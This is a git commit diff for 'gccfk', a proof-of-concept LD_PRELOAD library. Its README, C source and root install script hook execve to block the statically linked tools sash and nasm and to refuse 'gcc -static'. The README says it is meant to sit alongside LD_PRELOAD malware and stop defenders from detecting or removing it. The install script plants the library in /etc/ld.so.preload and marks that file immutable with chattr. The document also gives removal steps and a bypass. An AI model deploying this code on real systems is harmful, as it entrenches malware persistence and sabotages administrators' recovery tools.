first commit

Author: mempodippy

README.md

@@ -0,0 +1,18 @@
+# gccfk
+## information
+Small proof of concept to show how easy it is to break static compilation of binaries with gcc, and also execution of popular statically compiled programs, such as sash. By default, gccfk also breaks execution of nasm, since nasm is used to compile assembly.
+## usage
+gccfk can coexist with LD_PRELOAD malware to prevent detection/removal by use of statically compiled C programs. You can add your own blacklisted programs in gccfk.c @ static char blacklisted\_progs.
+## installation
+\# ./install.sh</br>
+That's it.
+## post-installation
+Any shells opened subsequent to installing gccfk will be unable to run sash, nasm, and will be unable to compile C source files with the "-static" flag.
+## removal
+\# chattr -ia /etc/ld.so.preload && rm /etc/ld.so.preload /lib/gccfk.so
+## why break static compilation?
+Statically compiling programs is the opposite of dynamically compiling programs. Statically compiled programs don't load any userland libraries, which the LD_PRELOAD attack relies on, and instead just call machine and kernel specific system calls.</br>
+Statically or dynamically compiled binaries don't matter when it comes to the kernel, so any system calls manipulated on a kernel level won't change regardless of binary compilation.
+## how to bypass gccfk
+<a href="https://docs.python.org/2/library/os.html#os.execl">Python os.exec* functions</a></br>
+Any function that isn't execve will be able to do everything normally, since gccfk by default doesn't hook the other exec* functions, due to this just being a proof of concept.

gccfk.c

@@ -0,0 +1,53 @@
+/*
+ *
+ *  Very simple PoC to show how you can break static compilation of binaries with gcc in LD_PRELOAD malware.
+ *  (and execution of certain statically compiled programs, but this can be bypassed easily)
+ *  (no file protection/hiding system is really required for this PoC)
+ *
+ */
+
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <dlfcn.h>
+
+#include <sys/types.h>
+#include <sys/stat.h>
+
+static char *blacklisted_progs[] = {"sash", "nasm", NULL};
+
+int (*old_execve)(const char *filename, char *const argv[], char *const envp[]);
+
+int execve(const char *filename, char *const argv[], char *const envp[])
+{
+    if(!old_execve) old_execve = dlsym(RTLD_NEXT, "execve");
+
+    int i = 0;
+
+    for(i = 0; blacklisted_progs[i] != NULL; i++)
+    {
+        if(strstr(argv[0], blacklisted_progs[i]))
+        {
+            errno = ENOMEM;
+            return -1;
+        }
+    }
+
+    if(strstr(argv[0], "gcc"))
+    {
+        for(i = 0; argv[i] != NULL; i++)
+        {
+            if(!strcmp(argv[i], "-static"))
+            {
+                errno = ENOMEM;
+                return -1;
+            }
+        }
+    }
+
+    return old_execve(filename, argv, envp);
+}

install.sh

@@ -0,0 +1,30 @@
+#!/bin/bash
+
+[ $(id -u) != 0 ] && { echo "Not root. Exiting."; exit; }
+
+read -p "Enter your desired install directory [/lib]: "
+if [ -z $REPLY ]; then
+    INSTALL_DIR="/lib"
+else
+    INSTALL_DIR=$REPLY
+fi
+
+echo "Compiling gccfk"
+
+CFLAGS="-ldl"
+WFLAGS="-Wall"
+FFLAGS="-fomit-frame-pointer -fPIC"
+gcc -std=gnu99 gccfk.c -O0 $WFLAGS $FFLAGS -shared $CFLAGS -Wl,--build-id=none -o gccfk.so
+strip gccfk.so
+
+echo "gccfk successfully configured and compiled."
+echo "Installing gccfk.so to $INSTALL_DIR and injecting into ld.so.preload"
+
+mv gccfk.so $INSTALL_DIR/
+echo "$INSTALL_DIR/gccfk.so" > /etc/ld.so.preload
+chattr +ia /etc/ld.so.preload
+
+echo "gccfk successfully installed on the system."
+echo "Try compiling something statically now. Good luck! (since this is a PoC, you can get by this just by calling execv in a Python script or something)"
+echo "Remember you can remove it by setting your environment variable ($OWNER_ENV_VAR) in a root shell and removing ld.so.preload."
+echo "Remember to run chattr -ia on ld.so.preload, or else you'll be unable to remove it. :p"